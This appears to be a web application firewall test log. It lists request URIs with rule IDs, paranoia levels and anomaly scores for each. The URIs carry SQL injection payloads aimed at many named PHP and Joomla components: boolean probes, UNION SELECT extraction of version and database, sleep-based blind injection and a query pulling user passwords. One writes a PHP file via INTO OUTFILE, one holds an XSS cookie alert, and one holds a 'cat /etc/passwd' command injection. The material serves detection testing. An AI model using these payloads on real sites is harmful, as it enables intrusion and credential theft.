Packet [270]	Uri [/other-user-profile.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [271]	Uri [/list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [273]	Uri [/list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [274]	Uri [/service-list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [275]	Uri [/service_detail.php?pid=1%20and%201=1::/www/event_detail.php?eventid=1%20and%201=1::/www/news_detail.php?newid=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [276]	Uri [/list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [277]	Uri [/categories?subctid=1%20and%201=1::/www/categories?&mctid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[932190]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [278]	Uri [/jobdetails.php?pr_id=1%20and%201=1::/www/searchbycat_list.php?catid=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [279]	Uri [/list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [280]	Uri [/event-list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [281]	Uri [/quicksearch.php?q=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [282]	Uri [/investcalc.php?price=1&projid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [283]	Uri [/list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [284]	Uri [/lawyer-list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [286]	Uri [/exams.php?sort=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [287]	Uri [/single_detail.php?sid=1%20and%201=1::/www/category.php?searchcat=1%20and%201=1::/www/category.php?chid1=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [288]	Uri [/service-list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [289]	Uri [/categories?subctid=1%20and%201=1::/www/categories?&mctid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[932190]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [291]	Uri [/property-list?tbud=5001-100001%20and%201=1&quicksrch1=]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [292]	Uri [/category.php?searchmain=1%20and%201=1&searchcat=1%20and%201=1::/www/single_detail.php?sid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [293]	Uri [/list?city=1%20and%201=1&main_search=]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [294]	Uri [/success-story.php?succid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [295]	Uri [/findcity.php?q=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [296]	Uri [/trailer-detail.php?moid=1%20and%201=1::/www/show-time.php?moid=1%20and%201=1::/www/event-detail.php?eid=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [297]	Uri [/findcity.php?q=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [298]	Uri [/news_detail.php?newid=1%20and%201=1::/www/event_detail.php?eventid=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [299]	Uri [/news-detail.php?newid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [300]	Uri [/countrycode1.php?val=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [301]	Uri [/city_ajax.php?state_id=1%20and%201=1::/www/category_list.php?search=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [302]	Uri [/success-story.php?succid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [303]	Uri [/city.php?country=1%20and%201=1&state=1%20and%201=1::/www/state.php?country=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [304]	Uri [/preview.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [305]	Uri [/search_result.php?marital=1%20and%201=1&submit::/www/search_result.php?gender=1%20and%201=1&submit::/www/search_result.php?country=1%20and%201=1&submit::/www/search_result.php?profileid=1%20and%201=1&submit]	PLmin [2]	Score [20]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [306]	Uri [/admin/userview.php?uid=1%20and%201=1::/www/admin/viewemcamp.php?fnum=1%20and%201=1::/www/admin/viewvisitcamp.php?fn=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [308]	Uri [/index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [309]	Uri [/index.php/en/component/jequestions/?view=tags&an=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [310]	Uri [/index.php?option=com_jevideogallery&view=category&id=991%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [312]	Uri [/index.php?option=com_jefaqpro&view=category&id=1%20and%201=1&Itemid=494]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [313]	Uri [/videosharing/search_video.php?search=123::/www/videosharing/viewsubs.php?chnlid=321]	PLmin [4]	Score [0]	Nattacks [2]	[920273]	[942432]
Packet [320]	Uri [/ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [321]	Uri [/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--]	PLmin [2]	Score [15]	Nattacks [11]	[920273]	[942100]	[942190]	[942360]	[942260]	[942310]	[942361]	[942480]	[942432]	[949110]	[980130]
Packet [322]	Uri [/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status=-1%27and%20SELECT%20*%20FROM%20table1--::/index.php?option=com_adagency&controller=adagencyAds&status_select=Y-1%27%20%and%20SELECT%20*%20FROM%20table4**&camp_id=3]	PLmin [2]	Score [3]	Nattacks [11]	[920220]	[920230]	[920272]	[920273]	[921180]	[942200]	[942260]	[942370]	[942431]	[942460]	[942432]
Packet [323]	Uri [/listing?keywords=1%20and%201=1&location=All%20United%20States&placetype=country&placeid=2311%20and%201=1&cat=1%20and%201=1&subcat=51%20and%201=1&filter=&sort=Newest&Submit='%20UNION%20ALL%20SELECT%20NULL,CONCAT(version(),0x7e7e,database()),NULL--%20gLLf]	PLmin [2]	Score [40]	Nattacks [20]	[920273]	[942100]	[942140]	[942190]	[942360]	[942110]	[942130]	[942150]	[942260]	[942361]	[942400]	[942410]	[942480]	[942440]	[942450]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [324]	Uri [/search/?q=&price_type=range&price=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [326]	Uri [/livecrm/web/index.php?r=site/login&company_id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [327]	Uri [/site_search.php?s_vehicletype=auto&s_order=1%20and%201=1&s_row=1%20and%201=1]	PLmin [2]	Score [10]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [328]	Uri [/index.php?id=1%20and%201=1::/www/mobile_preview.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [329]	Uri [/sellers_subcategories.php?IndustryID=1%20and%201=1::/www/suppliers.php?IndustryID=1%20and%201=1&CategoryID=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [330]	Uri [/pages/single_blog.php?id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [331]	Uri [/product-list.php?srch=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [332]	Uri [/site.php?id=1%20and%201=1::/www/pagelist.php?id=1%20and%201=1::/www/page_new.php?id=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [333]	Uri [/chat_im/chat_window.php?request_id=1%20and%201=1::/www/search_events.php?category=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [334]	Uri [/index.php?option=com_visualcalendar&view=load&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [335]	Uri [/index.php?option=com_cpeventcalendar&task=load&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [336]	Uri [/index.php?option=com_jeclassifieds&view=boutique&sid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [337]	Uri [/event.php?id=1%20and%201=1::/www/page.php?slug=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [4]	[920273]	[942130]	[942400]	[942432]
Packet [338]	Uri [/index.php?option=com_jereverseauction&view=products&layout=default_message&tmpl=component&id=1%20and%201=1&uid=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [339]	Uri [/index.php?option=com_jmsmusic&view=search&keyword=1%20and%201=1::/www/index.php?option=com_jmsmusic&view=search&artist=1%20and%201=1::/www/index.php?option=com_jmsmusic&view=search&username=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [340]	Uri [/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=1%20and%201=1::/www/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=1%20and%201=1::/www/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [341]	Uri [/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=1%20and%201=1::/www/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=1%20and%201=1]	PLmin [2]	Score [0]	Nattacks [5]	[920273]	[942130]	[942400]	[942431]	[942432]
Packet [344]	Uri [/component/smartshoutbox/archive?shoutauthor=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [346]	Uri [/index.php?option=com_gallery_wd&tag_id=&view=GalleryBox&gallery_id=71%20and%201=1::/www/index.php?option=com_gallery_wd&tag_id=1%20and%201=1&view=GalleryBox&gallery_id=7]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [347]	Uri [/index.php?option=com_advertisementboard&Itemid=132&task=show_rss_categories&catname=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [348]	Uri [/index.php?option=com_jquickcontact&task=refresh&sid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [349]	Uri [/index.php?option=com_ccnewsletter&task=removeSubscriber&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [350]	Uri [/index.php?option=com_avreloaded&view=popup&Itemid=55&divid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [351]	Uri [/index.php?option=com_formmaker&view=stats&id=1%20and%201=1::/www/index.php?option=com_formmaker&view=stats&form_id=1&id=1&from=1%20and%201=1::/www/index.php?option=com_formmaker&view=stats&form_id=1&id=1&to=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [352]	Uri [/index.php?option=com_staffmaster&view=staff&name=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [353]	Uri [/index.php?option=com_aist&view=showvacancy&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [354]	Uri [/index.php/component/jsjobs/newest-jobs?zipcode=1%20and%201=1&option=com_jsjobs&task11=view::/www/index.php?option=com_jsjobs&c=resume&view=resume&layout=view_resume&bd=1&sortby=1&ta=1%20and%201=1]	PLmin [2]	Score [10]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [356]	Uri [/index.php?option=com_realpin&pinboard=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [357]	Uri [/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&vtype=1%20and%201=1::/www/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&pre=1%20and%201=1::/www/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&prs=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [358]	Uri [/index.php?option=com_jomestate&task=detailed&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [360]	Uri [/index.php?option=com_bookpro&view=orderdetail&order_number=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [361]	Uri [/index.php?option=com_fastball&view=player&season=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [362]	Uri [/index.php?option=com_invitex&view=invites&invite_type=1%20and%201=1&invite_anywhere=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [363]	Uri [/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1%20and%201=1&id=1&format=raw::/www/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1%20and%201=1&format=raw::/www/index.php?option=com_gmap&view=gm_modal&tmpl=component&layout=default&map=1%20and%201=1]	PLmin [2]	Score [15]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [364]	Uri [/index.php?option=com_timetable&view=event&alias=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [365]	Uri [/index.php?option=com_dtregister&task=edit&controller=category&id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [366]	Uri [/index.php?option=com_jticketing&view=events&layout=all&filter_creator=1%20and%201=1::/www/index.php?option=com_jticketing&view=events&layout=all&filter_events_cat=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [367]	Uri [/index.php?option=com_saxumnumerology&view=savedresult&publicid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [368]	Uri [/index.php?option=com_saxumpicker&view=savedspread&publicid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [369]	Uri [/index.php?option=com_squadmanagement&task=removewarround&id=1%20and%201=1::/www/index.php?option=com_squadmanagement&controller=appointment&task=deleteappointment&id=1%20and%201=1::/www/index.php?option=com_squadmanagement&controller=appointment&task=removefromappointment&id=1%20and%201=1::/www/index.php?option=com_squadmanagement&view=editsquad&format=memberlist&squadid=1%20and%201=1::/www/index.php?option=com_squadmanagement&controller=squadmembers&task=addmember&squadid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [8]	[920273]	[921180]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [370]	Uri [/index.php?option=com_saxumastro&view=savedreading&publicid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [371]	Uri [/index.php?option=com_projectlog&view=cat&search=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [373]	Uri [/index.php?option=com_abook&view=category&letter=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [374]	Uri [/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [375]	Uri [/index.php/component/ekrishta/alluser?options=com_ekrishta&view=alluser&gender=1%20and%201=1&age1=1%20and%201=1&age2=1%20and%201=1&religion=1%20and%201=1&mothertounge=1%20and%201=1&caste=1%20and%201=1&country=1%20and%201=1]	PLmin [2]	Score [35]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [376]	Uri [/index.php?option=com_checklist&view=frontend&title_search=1%20and%201=1&tag_search=1%20and%201=1&name_search=1%20and%201=1&description_search=1%20and%201=1&filter_order=1%20and%201=1]	PLmin [2]	Score [25]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [377]	Uri [/os-property-layouts/search-tools/advanced-search?&option=com_osproperty&task=property_advsearch&cooling_system1=1%20and%201=1&heating_system1=1%20and%201=1&laundry=1%20and%201=1]	PLmin [2]	Score [15]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [378]	Uri [/jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23::/client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23]	PLmin [2]	Score [30]	Nattacks [14]	[920273]	[921180]	[942100]	[942190]	[942360]	[942260]	[942310]	[942361]	[942480]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [379]	Uri [/editDisplaynames.do?method=editDisplaynames&resids=1)%20AND%202410=2410%20AND%20(5744=5744]	PLmin [2]	Score [5]	Nattacks [7]	[920273]	[942100]	[942130]	[942400]	[942432]	[949110]	[980130]
Packet [382]	Uri [/mobile-loja/mensagem.asp?msgid=0&msgstr=Venda%20on-line%20encerrada.%20Adquira%20seu%20ingresso%20nos%20pontos%20oficiais%20ou%20na%20bilheteria%20do%20evento.&eve_cod=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [383]	Uri [/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271::/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1::/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=::/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=::/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit%201)&queue=history]	PLmin [2]	Score [50]	Nattacks [25]	[920273]	[921180]	[933161]	[941340]	[942100]	[942160]	[942170]	[942360]	[942110]	[942130]	[942150]	[942180]	[942200]	[942260]	[942310]	[942330]	[942370]	[942380]	[942390]	[942400]	[942410]	[942431]	[942432]	[949110]	[980130]
Packet [386]	Uri [/centreon/include/common/XmlTree/GetXmlTree.php?sid=%27%2Bif(1%3C2,sleep(1),%27%27)%2B%27]	PLmin [2]	Score [15]	Nattacks [17]	[920273]	[933161]	[942100]	[942160]	[942230]	[942110]	[942130]	[942150]	[942200]	[942330]	[942370]	[942410]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [387]	Uri [/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202::/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202::/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28%29,7,8,9,10%20--%202::/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12%20--%202]	PLmin [4]	Score [15]	Nattacks [17]	[920273]	[942100]	[942190]	[942360]	[942150]	[942200]	[942260]	[942361]	[942410]	[942480]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [388]	Uri [/index.php?action=attachment&file_name=%27::/index%20.php?action=show_comment%20&post=%27::/index.php?action=rssfeed&type=entry&sys-name=%27::/index.php?action=view&sys-name=%27]	PLmin [2]	Score [0]	Nattacks [7]	[920273]	[921180]	[942110]	[942260]	[942330]	[942460]	[942432]
Packet [389]	Uri [/1.2.0/product/search?search_query=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [390]	Uri [/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28do%20cument.cookie%29;%3C/script%3E::/admin/stats_monthly_sales.php?status=0%20union%20select%20'<?%20php_code%20?>'%20INTO%20OUTFILE%20'../../../path/to/site/file.php']	PLmin [2]	Score [45]	Nattacks [21]	[920273]	[930100]	[930110]	[933100]	[933190]	[941100]	[941110]	[941160]	[941320]	[941340]	[942190]	[942110]	[942130]	[942260]	[942480]	[942430]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [391]	Uri [/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+::/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+::/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+]	PLmin [2]	Score [45]	Nattacks [17]	[920273]	[921180]	[932190]	[942100]	[942140]	[942190]	[942150]	[942260]	[942400]	[942410]	[942480]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [392]	Uri [/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=1%20and%20SELECT%20*%20FROM%20table1]	PLmin [2]	Score [0]	Nattacks [2]	[920273]	[942200]
Packet [393]	Uri [/ecommercemajor/product.php?productbycat=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [394]	Uri [/index.php?act=category&cid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [395]	Uri [/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+::/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+::/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+::/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+::/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+::/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+::/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+]	PLmin [2]	Score [85]	Nattacks [19]	[920273]	[921180]	[942100]	[942140]	[942190]	[942130]	[942150]	[942260]	[942300]	[942400]	[942410]	[942480]	[942430]	[942440]	[942431]	[942460]	[942432]	[949110]	[980130]
Packet [397]	Uri [/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--]	PLmin [2]	Score [15]	Nattacks [11]	[920273]	[942100]	[942190]	[942360]	[942260]	[942310]	[942361]	[942480]	[942432]	[949110]	[980130]
Packet [398]	Uri [/script/load-calendar.php?view=1&month=6&year=2013&cid=1cat%20/etc/passwd::/script/load-calendar.php?cid=1cat%20/etc/passwd::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5::/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4]	PLmin [2]	Score [20]	Nattacks [16]	[920273]	[921180]	[930120]	[932160]	[942100]	[942130]	[942150]	[942300]	[942310]	[942400]	[942410]	[942480]	[942431]	[942432]	[949110]	[980130]
Packet [399]	Uri [/?ym_download_id=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [400]	Uri [/backend/main.php?area=con_configcat&idcat=1&idtplconf=0::/backend/main.php?area=plug&idclient=1]	PLmin [4]	Score [0]	Nattacks [2]	[920273]	[942432]
Packet [401]	Uri [/wp-admin/admin-ajax.php/?srch_txt='or%201=1--%20&action=the_search_text]	PLmin [2]	Score [5]	Nattacks [11]	[920273]	[942100]	[942110]	[942130]	[942180]	[942330]	[942390]	[942440]	[942432]	[949110]	[980130]
Packet [402]	Uri [/path/showads.php?catid=1%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [403]	Uri [/cgi/client.cgi?act=list_zone&group_id=11%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
Packet [404]	Uri [/admin/pages/modify.php?page_id=11%20and%201=1]	PLmin [2]	Score [5]	Nattacks [6]	[920273]	[942100]	[942130]	[942400]	[949110]	[980130]
